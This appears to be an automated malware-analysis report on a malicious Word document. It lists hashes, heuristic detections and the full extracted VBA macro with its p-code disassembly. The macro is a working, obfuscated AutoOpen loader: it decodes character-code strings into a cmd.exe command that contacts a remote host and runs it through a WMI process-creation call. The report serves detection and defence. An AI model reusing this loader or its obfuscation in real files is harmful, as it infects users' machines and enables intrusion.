Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 da7a785c217785a1…

MALICIOUS

Office (OLE) / .DOC

52.0 KB Created: 2026-06-07 14:27:00 Authoring application: Microsoft Office Word First seen: 2026-06-28
MD5: 50d9e23755c8eff45b7ea2220c6f2651 SHA-1: ed115acb379bdb2baca891d137fb6eb17b7567ab SHA-256: da7a785c217785a1537ba63ff4bf2134847da112c883960128a54048cc9daf65
190 Risk Score

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        GetObject(aHDFOqXekZrYdocrOpNOsjdQRoDghfW).Get(obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM).Create sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, iDiFwSGgutwANWqgSXDhnaAKC
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        GetObject(aHDFOqXekZrYdocrOpNOsjdQRoDghfW).Get(obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM).Create sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, iDiFwSGgutwANWqgSXDhnaAKC
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10694 bytes
SHA-256: 8a1cd5e2af71d3f4cda1f46e453405802fd965359c56550a717c7831a12f93ea
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu
End Sub

Sub FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu()
    Dim vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN As String
    Dim sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu As String
    
    vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN = "19920920014620122020113214719913213420020120813214" & _
    "72021321472131321671581921872052102002112192151921" & _
    "84197215207215192201210199146216220216132150162210" & _
    "21720813213813220020120813214720213214721313216715" & _
    "81921872052102002112192151921841972152072151921971" & _
    "46201220201132150162210217208132138132198205216215" & _
    "19720020920521013214718421419721021520220121413221" & _
    "62042011742111981322042162162121581471471491571501" & _
    "46149154156146152153146149153150147180183182217210" & _
    "21521219719920114517321021821120720118221721014519" & _
    "92012142162172162052081672112002012001462162202161" & _
    "32167158192187205210200211219215192184197215207215" & _
    "19220121019914621622021613213813219920121421621721" & _
    "62052081321452002011992112002011321671581921872052" & _
    "10200211219215192184197215207215192201210199146216" & _
    "22021613216715819218720521020021121921519218419721" & _
    "52072151921971462012202011321381321671581921872052" & _
    "10200211219215192177205199214211215211202216146178" & _
    "16918419217021419720920121921121420715415219221815" & _
    "21461481461511481511491571922052102152161972082082" & _
    "17216205208146201220201132147208211203202205208201" & _
    "16113214717621120318421116721121021521120820116120" & _
    "21972082152011321471851321671581921872052102002112" & _
    "19215192184197215207215192197146201220201134"
    

    sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu = zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR(vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN)
    On Error Resume Next
    If ActiveDocument.Name <> zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR("204201208208211146200211199") Then
        Exit Sub
    End If
    On Error GoTo 0
    

    Dim aHDFOqXekZrYdocrOpNOsjdQRoDghfW As String
    Dim obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM As String
    Dim iDiFwSGgutwANWqgSXDhnaAKC As Variant
    Dim OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS As Variant


    aHDFOqXekZrYdocrOpNOsjdQRoDghfW = zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR("219205210209203209216215158192192146192214211211216192199205209218150")
    obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM = zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR("187205210151150195180214211199201215215")
    OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS = Null

    GetObject(aHDFOqXekZrYdocrOpNOsjdQRoDghfW).Get(obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM).Create sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS, iDiFwSGgutwANWqgSXDhnaAKC


End Sub



Function hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR(FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu)
    hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR = Chr(FIhuXSbJumDnMpUKfVPkjLAVEAjHWiygu - 100)
End Function

Function LhBbnQJHaqwydGKtiTwGmpDzV(fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm)
    LhBbnQJHaqwydGKtiTwGmpDzV = Left(fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm, 3)
End Function

Function VddOROxmpnMMdeLojNuwlvgPXmC(yjKWenHHLnvyCuSHXYCsKhIyTnJGnH)
    VddOROxmpnMMdeLojNuwlvgPXmC = Right(yjKWenHHLnvyCuSHXYCsKhIyTnJGnH, Len(yjKWenHHLnvyCuSHXYCsKhIyTnJGnH) - 3)
End Function

Function zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR(pGaVjsZIyajfKIxlkCTLPpVyvJSF)
    Do
        pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW = pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW + hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR(LhBbnQJHaqwydGKtiTwGmpDzV(pGaVjsZIyajfKIxlkCTLPpVyvJSF))
        pGaVjsZIyajfKIxlkCTLPpVyvJSF = VddOROxmpnMMdeLojNuwlvgPXmC(pGaVjsZIyajfKIxlkCTLPpVyvJSF)
    Loop While Len(pGaVjsZIyajfKIxlkCTLPpVyvJSF) > 0
    zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR = pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW
End Function


' Processing file: /opt/analyzer/scan_staging/3d031d4574dc4919ba5afd3ed6026e6c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 954 bytes
' Macros/VBA/NewMacros - 8910 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' 	ArgsCall vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN 0x0000 
' Line #2:
' 	EndSub 
' Line #3:
' Line #4:
' 	FuncDefn (Sub vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN())
' Line #5:
' 	Dim 
' 	VarDefn sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu (As String)
' Line #6:
' 	Dim 
' 	VarDefn zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR (As String)
' Line #7:
' Line #8:
' 	LineCont 0x005C 04 00 04 00 06 00 04 00 08 00 04 00 0A 00 04 00 0C 00 04 00 0E 00 04 00 10 00 04 00 12 00 04 00 14 00 04 00 16 00 04 00 18 00 04 00 1A 00 04 00 1C 00 04 00 1E 00 04 00 20 00 04 00 22 00 04 00 24 00 04 00 26 00 04 00 28 00 04 00 2A 00 04 00 2C 00 04 00 2E 00 04 00 30 00 04 00
' 	LitStr 0x0032 "19920920014620122020113214719913213420020120813214"
' 	LitStr 0x0032 "72021321472131321671581921872052102002112192151921"
' 	Concat 
' 	LitStr 0x0032 "84197215207215192201210199146216220216132150162210"
' 	Concat 
' 	LitStr 0x0032 "21720813213813220020120813214720213214721313216715"
' 	Concat 
' 	LitStr 0x0032 "81921872052102002112192151921841972152072151921971"
' 	Concat 
' 	LitStr 0x0032 "46201220201132150162210217208132138132198205216215"
' 	Concat 
' 	LitStr 0x0032 "19720020920521013214718421419721021520220121413221"
' 	Concat 
' 	LitStr 0x0032 "62042011742111981322042162162121581471471491571501"
' 	Concat 
' 	LitStr 0x0032 "46149154156146152153146149153150147180183182217210"
' 	Concat 
' 	LitStr 0x0032 "21521219719920114517321021821120720118221721014519"
' 	Concat 
' 	LitStr 0x0032 "92012142162172162052081672112002012001462162202161"
' 	Concat 
' 	LitStr 0x0032 "32167158192187205210200211219215192184197215207215"
' 	Concat 
' 	LitStr 0x0032 "19220121019914621622021613213813219920121421621721"
' 	Concat 
' 	LitStr 0x0032 "62052081321452002011992112002011321671581921872052"
' 	Concat 
' 	LitStr 0x0032 "10200211219215192184197215207215192201210199146216"
' 	Concat 
' 	LitStr 0x0032 "22021613216715819218720521020021121921519218419721"
' 	Concat 
' 	LitStr 0x0032 "52072151921971462012202011321381321671581921872052"
' 	Concat 
' 	LitStr 0x0032 "10200211219215192177205199214211215211202216146178"
' 	Concat 
' 	LitStr 0x0032 "16918419217021419720920121921121420715415219221815"
' 	Concat 
' 	LitStr 0x0032 "21461481461511481511491571922052102152161972082082"
' 	Concat 
' 	LitStr 0x0032 "17216205208146201220201132147208211203202205208201"
' 	Concat 
' 	LitStr 0x0032 "16113214717621120318421116721121021521120820116120"
' 	Concat 
' 	LitStr 0x0032 "21972082152011321471851321671581921872052102002112"
' 	Concat 
' 	LitStr 0x002C "19215192184197215207215192197146201220201134"
' 	Concat 
' 	St sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu 
' Line #9:
' Line #10:
' Line #11:
' 	Ld sDohJQLPbtTYbfnVjcUPSLRNcJKCZSEu 
' 	ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001 
' 	St zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR 
' Line #12:
' 	OnError (Resume Next) 
' Line #13:
' 	Ld ActiveDocument 
' 	MemLd Name 
' 	LitStr 0x001B "204201208208211146200211199"
' 	ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001 
' 	Ne 
' 	IfBlock 
' Line #14:
' 	ExitSub 
' Line #15:
' 	EndIfBlock 
' Line #16:
' 	OnError (GoTo 0) 
' Line #17:
' Line #18:
' Line #19:
' 	Dim 
' 	VarDefn obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM (As String)
' Line #20:
' 	Dim 
' 	VarDefn iDiFwSGgutwANWqgSXDhnaAKC (As String)
' Line #21:
' 	Dim 
' 	VarDefn OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS (As Variant)
' Line #22:
' 	Dim 
' 	VarDefn hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR (As Variant)
' Line #23:
' Line #24:
' Line #25:
' 	LitStr 0x0045 "219205210209203209216215158192192146192214211211216192199205209218150"
' 	ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001 
' 	St obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM 
' Line #26:
' 	LitStr 0x0027 "187205210151150195180214211199201215215"
' 	ArgsLd aHDFOqXekZrYdocrOpNOsjdQRoDghfW 0x0001 
' 	St iDiFwSGgutwANWqgSXDhnaAKC 
' Line #27:
' 	LitVarSpecial (Null)
' 	St hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR 
' Line #28:
' Line #29:
' 	Ld zbtvajTTJKcGHfzCwoQVUgvToFjjjAJMSfZXNlcmBdaqSSR 
' 	Ld hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR 
' 	Ld hnqAurCCFhbzNwbWmDtLKpHAfhUZxlbUUouR 
' 	Ld OiCCPkaNwdSbiBVzUFkubsTRroLxVIhFjAbccWVwwZUHS 
' 	Ld iDiFwSGgutwANWqgSXDhnaAKC 
' 	Ld obXekPtkfClbwoqdOuqeYACaJiZzaWSQooDavMOHRfGjQpM 
' 	ArgsLd GetObject 0x0001 
' 	ArgsMemLd Get 0x0001 
' 	ArgsMemCall Create 0x0004 
' Line #30:
' Line #31:
' Line #32:
' 	EndSub 
' Line #33:
' Line #34:
' Line #35:
' Line #36:
' 	FuncDefn (Function LhBbnQJHaqwydGKtiTwGmpDzV(vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN))
' Line #37:
' 	Ld vzZtfOaTHKzzdEytpdJsMbkfWDGMAYpiUqeVN 
' 	LitDI2 0x0064 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	St LhBbnQJHaqwydGKtiTwGmpDzV 
' Line #38:
' 	EndFunc 
' Line #39:
' Line #40:
' 	FuncDefn (Function fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm(VddOROxmpnMMdeLojNuwlvgPXmC))
' Line #41:
' 	Ld VddOROxmpnMMdeLojNuwlvgPXmC 
' 	LitDI2 0x0003 
' 	ArgsLd Left 0x0002 
' 	St fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm 
' Line #42:
' 	EndFunc 
' Line #43:
' Line #44:
' 	FuncDefn (Function yjKWenHHLnvyCuSHXYCsKhIyTnJGnH(pGaVjsZIyajfKIxlkCTLPpVyvJSF))
' Line #45:
' 	Ld pGaVjsZIyajfKIxlkCTLPpVyvJSF 
' 	Ld pGaVjsZIyajfKIxlkCTLPpVyvJSF 
' 	FnLen 
' 	LitDI2 0x0003 
' 	Sub 
' 	ArgsLd Right 0x0002 
' 	St yjKWenHHLnvyCuSHXYCsKhIyTnJGnH 
' Line #46:
' 	EndFunc 
' Line #47:
' Line #48:
' 	FuncDefn (Function aHDFOqXekZrYdocrOpNOsjdQRoDghfW(pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW))
' Line #49:
' 	Do 
' Line #50:
' 	Ld _B_var_pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' 	Ld pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' 	ArgsLd fHjKrPnzifYfpkWLDbUIWLqXMRdHePAmnahBUdwm 0x0001 
' 	ArgsLd LhBbnQJHaqwydGKtiTwGmpDzV 0x0001 
' 	Add 
' 	St _B_var_pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' Line #51:
' 	Ld pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' 	ArgsLd yjKWenHHLnvyCuSHXYCsKhIyTnJGnH 0x0001 
' 	St pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' Line #52:
' 	Ld pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' 	FnLen 
' 	LitDI2 0x0000 
' 	Gt 
' 	LoopWhile 
' Line #53:
' 	Ld _B_var_pbTygBtHqPhJxKKmbwrBAjOCHDQgxSaAEXW 
' 	St aHDFOqXekZrYdocrOpNOsjdQRoDghfW 
' Line #54:
' 	EndFunc 
' Line #55: